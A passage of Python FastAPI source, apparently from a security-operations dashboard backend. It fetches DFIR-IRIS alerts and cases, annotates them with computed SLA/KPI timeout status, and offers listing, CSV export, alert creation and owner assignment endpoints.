kpi_pct >= 80: status = "On Track" elif kpi_pct >= 60: status = "Watch" elif kpi_pct >= 40: status = "Warning" elif kpi_pct >= 20: status = "Urgent" elif kpi_pct > 0: status = "Critical" else: status = "Breached" return { "kpi_pct": round(kpi_pct, 1), "elapsed_pct": round(elapsed_pct, 1), "status": status, "segments": segments, "resolved": False, } def _enrich_alerts_with_kpi(iris_response: dict) -> dict: """Inject kpi field into each alert row returned by IRIS. IRIS GET /api/v2/alerts returns: { "total": N, "data": [...], ... } """ alerts = iris_response.get("data", []) if not isinstance(alerts, list): return iris_response for alert in alerts: created_at = alert.get("alert_creation_time") or "" severity = (alert.get("severity") or {}).get("severity_name", "Medium") if not created_at: continue resolved_at: str | None = None if alert.get("alert_resolution_status_id") is not None: history: dict = alert.get("modification_history") or {} if history: last_ts = max(history.keys(), key=lambda k: float(k)) resolved_at = datetime.fromtimestamp(float(last_ts), tz=timezone.utc).isoformat() try: alert["kpi"] = compute_kpi(created_at, severity, resolved_at) except Exception: alert["kpi"] = {"kpi_pct": 0, "elapsed_pct": 100, "status": "Breached", "segments": [], "resolved": False} return iris_response def _enrich_cases_with_kpi(iris_response: dict) -> dict: # v2 cases list: { "data": [...], "total": N, ... } # Each case uses open_date / close_date / state.state_name / severity_id _CASE_SEV: dict[int, str] = {1: "Medium", 4: "Low", 5: "High", 6: "High"} # severity_id → name cases = iris_response.get("data") or iris_response.get("items", []) if not isinstance(cases, list): return iris_response for case in cases: created_at = case.get("open_date") or "" if not created_at: continue sev_id = case.get("severity_id") or 1 severity = _CASE_SEV.get(int(sev_id), "Medium") resolved_at = None close_date = case.get("close_date") state_name = ((case.get("state") or {}).get("state_name") or "").lower() if close_date: resolved_at = close_date elif state_name == "closed": resolved_at = created_at try: case["kpi"] = compute_kpi(created_at, severity, resolved_at) except Exception: case["kpi"] = {"kpi_pct": 0, "elapsed_pct": 100, "status": "Breached", "segments": [], "resolved": False} return iris_response @app.get( "/iris/cases/export-csv", summary="Export IRIS cases as CSV", description="Download all cases (up to 1000) with KPI as a CSV attachment.", ) async def iris_export_cases_csv() -> StreamingResponse: try: raw = await iris_adapter.list_cases(limit=1000, offset=0) except Exception as exc: raise HTTPException(status_code=502, detail=f"IRIS case export failed: {exc}") from exc enriched = _enrich_cases_with_kpi(raw) cases = enriched.get("data") or enriched.get("items", []) _CASE_SEV: dict[int, str] = {1: "Medium", 4: "Low", 5: "High", 6: "High"} output = io.StringIO() fieldnames = ["case_id", "case_name", "severity", "state", "open_date", "close_date", "kpi_pct", "kpi_status"] writer = csv.DictWriter(output, fieldnames=fieldnames, extrasaction="ignore") writer.writeheader() for case in cases: kpi = case.get("kpi", {}) writer.writerow({ "case_id": case.get("case_id", ""), "case_name": case.get("case_name", ""), "severity": _CASE_SEV.get(int(case.get("severity_id") or 1), "Medium"), "state": (case.get("state") or {}).get("state_name", ""), "open_date": case.get("open_date", ""), "close_date": case.get("close_date", ""), "kpi_pct": kpi.get("kpi_pct", ""), "kpi_status": kpi.get("status", ""), }) output.seek(0) return StreamingResponse( iter([output.getvalue()]), media_type="text/csv", headers={"Content-Disposition": "attachment; filename=iris_cases.csv"}, ) @app.get( "/iris/cases/{case_id}", response_model=ApiResponse, summary="Get single IRIS case with KPI", description="Fetch one DFIR-IRIS case by ID and annotate with computed KPI data.", ) async def iris_get_case(case_id: int) -> ApiResponse: try: raw = await iris_adapter.get_case(case_id) except Exception as exc: raise HTTPException(status_code=502, detail=f"IRIS case fetch failed: {exc}") from exc wrapper = {"data": [raw]} enriched = _enrich_cases_with_kpi(wrapper) case_out = enriched["data"][0] if enriched.get("data") else raw return ApiResponse(data={"case": case_out}) @app.get( "/iris/cases", response_model=ApiResponse, summary="List IRIS cases with KPI", description="Fetch cases from DFIR-IRIS and annotate each with computed KPI data.", ) async def iris_list_cases( page: int = 1, per_page: int = 20, sort_by: str = "case_id", sort_dir: str = "desc", filter_name: str | None = None, ) -> ApiResponse: # adapter maps (limit, offset) → (per_page, page) for IRIS v2 offset = (page - 1) * per_page try: raw = await iris_adapter.list_cases(limit=per_page, offset=offset) except Exception as exc: raise HTTPException(status_code=502, detail=f"IRIS case list failed: {exc}") from exc enriched = _enrich_cases_with_kpi(raw) items = enriched.get("data") or enriched.get("items", []) total = enriched.get("total", len(items)) last_page = enriched.get("last_page", max(1, -(-total // per_page))) if filter_name: items = [c for c in items if filter_name.lower() in (c.get("case_name") or "").lower()] reverse = sort_dir == "desc" items.sort(key=lambda c: c.get(sort_by) or 0, reverse=reverse) return ApiResponse(data={"cases": { "data": items, "total": total, "current_page": page, "last_page": last_page, }}) @app.post( "/iris/alerts", response_model=ApiResponse, summary="Create IRIS alert", description="Create a new alert in DFIR-IRIS via /api/v2/alerts.", ) async def iris_create_alert(payload: IrisAlertCreateRequest) -> ApiResponse: alert_payload: dict[str, Any] = { "alert_title": payload.title, "alert_description": payload.description, "alert_severity_id": payload.severity_id, "alert_status_id": payload.status_id, "alert_source": payload.source, "alert_customer_id": payload.customer_id or settings.iris_default_customer_id, "alert_source_event_time": datetime.now(timezone.utc).isoformat(), } if payload.source_ref: alert_payload["alert_source_ref"] = payload.source_ref if payload.payload: alert_payload.update(payload.payload) try: result = await iris_adapter.create_alert(alert_payload) except Exception as exc: raise HTTPException(status_code=502, detail=f"IRIS alert create failed: {exc}") from exc return ApiResponse(data={"alert": result}) @app.get( "/iris/alerts", response_model=ApiResponse, summary="List IRIS alerts with KPI Timeout", description="Fetch alerts from DFIR-IRIS and annotate each row with computed KPI Timeout data.", ) async def iris_list_alerts( page: int = 1, per_page: int = 20, sort_by: str = "alert_id", sort_dir: str = "desc", filter_title: str | None = None, filter_owner_id: int | None = None, ) -> ApiResponse: try: raw = await iris_adapter.list_alerts( page=page, per_page=per_page, sort_by=sort_by, sort_dir=sort_dir, filter_title=filter_title, filter_owner_id=filter_owner_id, ) enriched = _enrich_alerts_with_kpi(raw) return ApiResponse(data={ "alerts": { "data": enriched.get("data", []), "total": enriched.get("total", 0), "current_page": enriched.get("current_page", page), "last_page": enriched.get("last_page", 1), } }) except Exception as exc: raise HTTPException(status_code=502, detail=f"IRIS alert list failed: {exc}") from exc @app.get( "/iris/alerts/export-csv", summary="Export IRIS alerts as CSV", description="Download all matching alerts (up to 1000) as a CSV attachment.", ) async def iris_export_alerts_csv( sort_by: str = "alert_id", sort_dir: str = "desc", filter_title: str | None = None, filter_owner_id: int | None = None, ) -> StreamingResponse: try: raw = await iris_adapter.list_alerts( page=1, per_page=1000, sort_by=sort_by, sort_dir=sort_dir, filter_title=filter_title, filter_owner_id=filter_owner_id, ) except Exception as exc: raise HTTPException(status_code=502, detail=f"IRIS alert export failed: {exc}") from exc enriched = _enrich_alerts_with_kpi(raw) alerts = enriched.get("data", []) output = io.StringIO() fieldnames = [ "alert_id", "alert_title", "alert_severity", "alert_status", "alert_creation_time", "alert_source_event_time", "alert_owner", "kpi_pct", "kpi_status", ] writer = csv.DictWriter(output, fieldnames=fieldnames, extrasaction="ignore") writer.writeheader() for alert in alerts: kpi = alert.get("kpi", {}) severity_name = (alert.get("severity") or {}).get("severity_name", "") writer.writerow({ "alert_id": alert.get("alert_id", ""), "alert_title": alert.get("alert_title", ""), "alert_severity": severity_name, "alert_status": (alert.get("status") or {}).get("status_name", ""), "alert_creation_time": alert.get("alert_creation_time", ""), "alert_source_event_time": alert.get("alert_source_event_time", ""), "alert_owner": (alert.get("owner") or {}).get("user_name", ""), "kpi_pct": kpi.get("kpi_pct", ""), "kpi_status": kpi.get("status", ""), }) output.seek(0) return StreamingResponse( iter([output.getvalue()]), media_type="text/csv", headers={"Content-Disposition": "attachment; filename=iris_alerts.csv"}, ) @app.get( "/iris/alerts/{alert_id}", response_model=ApiResponse, summary="Get single IRIS alert with KPI", description="Fetch one DFIR-IRIS alert by ID and annotate with computed KPI data.", ) async def iris_get_alert(alert_id: int) -> ApiResponse: try: raw = await iris_adapter.get_alert(alert_id) except Exception as exc: raise HTTPException(status_code=502, detail=f"IRIS alert fetch failed: {exc}") from exc # Wrap in list-shaped dict so _enrich_alerts_with_kpi can process it alert = raw if isinstance(raw, dict) else {} wrapper = {"data": [alert]} enriched = _enrich_alerts_with_kpi(wrapper) alert_out = enriched["data"][0] if enriched.get("data") else alert return ApiResponse(data={"alert": alert_out}) @app.post( "/iris/alerts/{alert_id}/assign", response_model=ApiResponse, summary="Assign IRIS alert to owner", description="Update the owner of a DFIR-IRIS alert.", ) async def iris_assign_alert(alert_id: int, body: dict) -> ApiResponse: owner_id = body.get("owner_id") if not isinstance(owner_id, int): raise HTTPException(status_code=422, detail="owner_id must be an integer") try: result = await iris_adapter.assign_alert(alert_id=alert_id, owner_id=owner_id) return ApiResponse(data=result) except Exception as exc: raise HTTPException(status_code=502, detail=f"IRIS alert assign failed: {exc}") from exc